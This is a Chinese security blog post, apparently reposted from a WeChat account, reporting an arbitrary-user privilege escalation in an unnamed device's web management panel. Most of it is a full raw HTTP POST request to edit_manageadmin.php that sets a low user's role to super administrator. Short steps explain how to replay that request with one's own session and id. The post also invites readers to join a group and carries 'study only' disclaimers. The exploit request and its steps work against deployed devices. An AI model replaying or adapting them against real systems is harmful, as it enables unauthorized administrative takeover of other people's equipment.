一.背景
各位师傅好久不见啦,被群里骂死了,都好久没更新文章了,今天就更新一篇吧。嘿嘿不愿透露姓名的大佬提供
一.过程
具体咋搜不透露了,老规矩知道的师傅都懂,我只教技巧。我们直接废话不多说 上图 从图中有个查看或者删除版本,这里说明你的文件是先上传
POST /sysmanage/edit_manageadmin.php? HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 114Origin: https://xxx.xxx.xxx.xxxDNT: 1Connection: closeReferer: https://xxx.xxx.xxx.xxx /sysmanage/edit_manageadmin.php?id=2Cookie: PHPSESSID=84948c0273476e524d610193ced36081(注:当前登录的cookie)Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1txt_pwd2=123456&txt_pwd=123456&txt_pwd1=123456&sel_role=1&errortry=10&selquestion=0&txt_answer=&mode=edit&hid_id=7
具体操作如下 为了验证问题先用管理员创建一个普通用户
退出超级管理员,登录123账号
构造数据查询,自身id值
对页面进行抓包,构成数据包,,提权为超级管理员
5.回显如下,重登录用户结果
觉得好看的师傅们请给个关注呗。如果想要进去请公众号回复加群即可
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。切勿用于非法,仅供学习参考
我不会渗透,我们下次再见!
原文始发于微信公众号(深夜笔记本):某设备存在任意用户提权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论